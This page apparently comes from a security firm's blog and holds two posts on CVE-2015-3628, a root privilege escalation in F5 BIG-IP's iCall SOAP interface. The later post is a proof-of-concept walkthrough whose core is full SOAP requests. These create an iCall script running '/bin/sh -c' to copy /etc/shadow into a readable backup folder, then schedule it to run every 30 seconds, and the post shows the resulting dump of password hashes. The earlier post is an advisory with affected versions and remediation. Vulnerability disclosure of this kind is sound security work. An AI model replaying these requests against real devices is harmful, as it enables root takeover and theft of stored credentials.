Search
RSS Feed
Twitter

Entries in F5 (2)

Wednesday
Nov252015

Exploiting F5 iCall::Script Privilege Escalation (CVE-2015-3628)

Earlier this year GDS discovered a vulnerability in the F5 BIG-IP LTM product, that allows a user with limited access to the system to escalate his privileges and obtain highly privileged remote command execution on the device. This vulnerability was described in a previous post.

In this post we’ll show how to manually exploit the vulnerability. A Metasploit module to automate the process is also available - see https://www.rapid7.com/db/modules/exploit/linux/http/f5_icall_cmd for details. 

Overview:

The issue was identified in the SOAP interface exposed by the devices at https://<host>/iControl/iControlPortal.cgi (a similar issue, although on a completely different function, was previously found in this same interface -  see CVE-2014-2928 for details). An attacker with valid credentials for the web interface and the “Resource Administrator” role can abuse the iCall SOAP functions to run arbitrary commands on the device with root privileges.

Using the iCall interface it’s possible to create and run management scripts, these are executed by a Tcl interpreter effectively running with root privileges.

See the F5 Security Advisory for a list of vulnerable versions.

Proof-Of-Concept:

The following steps demonstrate the attack by retrieving the “/etc/shadow” file, containing all password hashes from the device. However, it is possible to obtain a root command shell on the device using the same method.

For purpose of demonstration a user named “test” with the “Resource Administrator” role and password “default” has been created on the device. This user was defined without any shell access. 

The following HTTP POST request will create an iCall script on the device, the malicious payload exec /bin/sh -c “id>/var/local/ucs/file.ucs;cat /etc/shadow >>/var/local/ucs/file.ucs;chmod a+r /var/local/ucs/file.ucs” is highlighted in red.

The executed script does not return any output, however, the content of the shadow password file will be copied into a directory used to store configuration backups for the device. From here it is be possible to retrieve it using the web interface, as will be deomonstrated later. We’ll include also in the file the output from the “id” command, to show that the commands are executed as root.

Request:

POST /iControl/iControlPortal.cgi HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:iControl:iCall/Script
Host: 10.0.0.249
Content-Length: 866
Authorization: Basic dGVzdDpkZWZhdWx0=


<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:scr="urn:iControl:iCall/Script" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Header/>
<soapenv:Body>
<scr:create soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<scripts xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl"><item>exploit</item></scripts>
<definitions xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl"><item>exec /bin/sh -c "id>/var/local/ucs/file.ucs;cat /etc/shadow >>/var/local/ucs/file.ucs;chmod a+r /var/local/ucs/file.ucs" </item></definitions>
</scr:create>
</soapenv:Body>
</soapenv:Envelope>

Response:

HTTP/1.1 200 OK
Date: Fri, 26 Jun 2015 14:30:32 GMT
Server: Apache
SOAPServer: EasySoap++/0.6
X-Frame-Options: SAMEORIGIN
Content-Type: text/xml; charset="UTF-8"
Content-Length: 428

<E:Envelope
xmlns:E="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:A="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://www.w3.org/2001/XMLSchema-instance"
xmlns:y="http://www.w3.org/2001/XMLSchema"
xmlns:iControl="urn:iControl"
E:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<E:Body>
<m:createResponse
xmlns:m="urn:iControl:iCall/Script"></m:createResponse>
</E:Body>
</E:Envelope>

To trigger execution of the script the iCall interface provides different types of handlers; in this case a PeriodicHandler will be used with the following request: 

POST /iControl/iControlPortal.cgi HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:iControl:iCall/PeriodicHandler
Host: 10.0.0.249
Content-Length: 923
Authorization: Basic dGVzdDpkZWZhdWx0=

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:per="urn:iControl:iCall/PeriodicHandler" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Header/>
<soapenv:Body>
<per:create soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<handlers xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">
<item>exploitHandler</item>
</handlers>
<scripts xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">
<item>/Common/exploit</item>
</scripts>
<intervals xsi:type="urn:Common.ULongSequence" soapenc:arrayType="xsd:long[]" xmlns:urn="urn:iControl">
<item>30</item>
</intervals>
</per:create>
</soapenv:Body>
</soapenv:Envelope>

Response:

HTTP/1.1 200 OK
Date: Fri, 26 Jun 2015 14:36:30 GMT
Server: Apache
Set-Cookie: BIGIPAuthCookie=E41B1D179BD9DBF88AF1FF43F2390E5ED6BD6199; path=/; Secure;
Set-Cookie: BIGIPAuthUsernameCookie=test; path=/; Secure;
SOAPServer: EasySoap++/0.6
X-Frame-Options: SAMEORIGIN
Content-Type: text/xml; charset="UTF-8"
Content-Length: 428

<E:Envelope
xmlns:E="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:A="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://www.w3.org/2001/XMLSchema-instance"
xmlns:y="http://www.w3.org/2001/XMLSchema"
xmlns:iControl="urn:iControl"
E:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<E:Body>
<m:createResponse
xmlns:m="urn:iControl:iCall/PeriodicHandler"></m:createResponse>
</E:Body>
</E:Envelope>

From this point the script will be executed every 30 seconds by the generated handler.

The output file can be retrieved by logging into the device and navigating to System->Archives, as shown in the following screenshots:

 

f5-shot1.png

 

f5-shot2.png

The downloaded file contains the output of the commands, as expected:

$ cat file.ucs
uid=0(root) gid=0(root) context=system_u:system_r:init_t

root:$1$8kIUIrbb$b7FOEXTrKOiOgJ1w0T78F/:16496:0:99999:7:::
bin:*:16153::::::
daemon:*:16153::::::
adm:*:16153::::::
lp:*:16153::::::
mail:*:16153::::::
uucp:*:16153::::::
operator:*:16153::::::
nobody:*:16153::::::
tmshnobody:*:16153::::::
admin:$1$VFlFWR0F$iIy0wXSbTl4EpmMYPnX1A.:16496:0:99999:7:::
apache:!!:16153::::::
mysql:!!:16153::::::
vcsa:!!:16153::::::
oprofile:!!:16153::::::
sshd:!!:16153::::::
syscheck:!!:16153::::::
rpc:!!:16153::::::
f5_remoteuser:!!:16153::::::
pcap:!!:16153::::::
tomcat:!!:16153::::::
ntp:!!:16153::::::
named:!!:16153::::::
test:$1$SO17paaX$hNC27dZsBM9l3kSFuY/h9.:16500:0:99999:7:::

Remediation:

Apply vendor patches. If this is not feasible, review configuration for any accounts in the Resource Administrator role. Update the configuration to use provide the least privilege necessary while acknowledging the Resource Administrators have unconstrained privileges patches for this issue are applied.

Disclosure Timeline:

2015/04/07 - Vulnerability reported to the F5 Security Response Team.
2015/04/27 - F5 confirm vulnerability and affected versions.
2015/09/05 - F5 release version 12.0.0 which is not affected by this vulnerability.
2015/09/22 - F5 release 11.5.3 HF2 which resolves this issue.
2015/10/30 - F5 release 11.6.0 HF6 which resolves this issue.
2015/11/19 - Metasploit modue released.

Tuesday
Sep082015

F5 iCall::Script Privilege Escalation (CVE-2015-3628)

Overview

Earlier this year GDS discovered a vulnerability in the F5 BIG-IP LTM product that allows a user with limited access to the system to escalate privileges and obtain highly privileged remote command execution on the device.


This issue was identified in the SOAP interface exposed on these devices at https://<host>/iControl/iControlPortal.cgi (a similar issue, although in a completely different function, was previously found in this same interface -  see CVE-2014-2928). An attacker with valid credentials for the web interface and the Resource Administrator role can abuse the iCall SOAP functions to run arbitrary commands on the device with root privileges.


Am I vulnerable?

This vulnerability has been fixed in BIG-IP version 12.0 and 11.5.3 HF2. Other versions of BIG-IP from 11.3 to 11.6 have been confirmed to be vulnerable. Additionally, all versions of BIG-IQ and versions of Enterprise Manager from 3.1 are vulnerable. For more detailed information see the F5 Security Advisory.


Exploitation

Detailed exploitation information is available on request and will be published after further patches are released.

 

Remediation

Upgrade to BIG-IP version 12.0 or apply vendor patches once they are released. In the interim review configuration for any accounts in the Resource Administrator role. Update the configuration to use the least privilege necessary, while acknowledging that Resource Administrators have unconstrained privileges until this issue is patched.